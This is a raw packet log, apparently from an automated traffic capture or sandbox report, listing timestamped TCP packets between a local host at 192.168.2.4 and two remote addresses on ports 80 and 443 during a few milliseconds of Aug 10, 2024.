Aug 10, 2024 16:12:24.766627073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766674995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766717911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766717911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766717911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766717911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766726017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766757011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766788006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766815901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766864061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766879082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766879082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766897917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766911030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766928911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766957998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766961098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766989946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767021894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767031908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767031908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767056942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767081022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767105103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767112970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767137051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767185926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767218113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767250061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767281055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767299891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767299891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767299891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767299891 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767312050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767344952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767376900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767407894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767440081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767452002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767452002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767452002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767452002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767471075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767502069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767532110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767564058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767596006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767627954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767637014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767637014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767637014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767657995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767689943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767720938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767748117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767748117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767748117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767752886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767781973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767812967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767846107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767877102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767910004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767924070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767924070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767924070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767924070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.767940998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.767972946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.768004894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.768111944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.768111944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.768111944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.797286987 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.797305107 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.797440052 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.797447920 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.797768116 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.801321983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801369905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801377058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.801402092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801415920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.801434040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801465988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801480055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.801510096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.801547050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801578999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.801593065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.801631927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.822453976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.822484970 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.822638988 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.822644949 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.822771072 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.822794914 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.822813034 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.822875977 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.822880983 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.822974920 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.823025942 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823040962 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823122978 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.823128939 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823302984 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.823394060 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823407888 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823461056 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.823465109 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823600054 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.823699951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823715925 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823767900 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.823771954 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.823944092 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.824662924 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.824678898 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.824742079 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.824745893 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.824882030 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.825521946 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.825539112 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.825901985 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.825906992 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.825963020 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.838360071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838458061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838466883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838500977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838541031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838572979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838604927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838613987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838637114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838669062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838700056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838718891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838731050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838742018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838762999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838794947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838826895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838846922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838857889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838875055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.838892937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.838907957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839020967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839495897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839544058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839545965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839585066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839592934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839656115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839659929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839704037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839709997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839740992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839772940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839776993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839786053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839804888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839809895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839837074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839843035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839868069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839900970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839931011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839950085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839965105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.839993000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.839998960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840002060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840145111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840208054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840254068 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840257883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840289116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840302944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840320110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840337992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840353966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840383053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840385914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840428114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840437889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840495110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840517998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840572119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840578079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840601921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840617895 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840646982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840651035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840715885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840719938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840747118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840756893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840780020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840811014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840823889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840842962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840847969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840873957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840908051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840919971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.840939999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840970993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.840984106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.841002941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.841037989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.841065884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.841092110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.841187954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842621088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842653990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842672110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842703104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842705011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842753887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842781067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842787981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842804909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842816114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842845917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842878103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842880011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842917919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842930079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842962027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.842988014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.842993975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843000889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843025923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843034983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843066931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843077898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843108892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843141079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843162060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843172073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843173027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843204975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843219042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843233109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843265057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843280077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843297958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843326092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843331099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843334913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843364000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843405008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843424082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843456984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843477011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843488932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843491077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843519926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.843532085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.843653917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845242023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845290899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845313072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845324039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845335960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845355034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845375061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845386982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845413923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845418930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845427036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845458984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845468998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845500946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845510960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845532894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845578909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845578909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845629930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845660925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845674038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845694065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845741987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845743895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845776081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845807076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845818996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845845938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845856905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845890999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845923901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845949888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845956087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.845978975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.845988035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846019983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846036911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846052885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846060991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846115112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846117020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846147060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846158028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846184969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846195936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846218109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846235991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846250057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846271992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846281052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846313000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846327066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846349955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846355915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846381903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846414089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846443892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846446037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.846463919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.846483946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854310989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854342937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854374886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854391098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854407072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854437113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854576111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854624033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854635954 CEST	49740	80	192.168.2.4	147.45.44.104
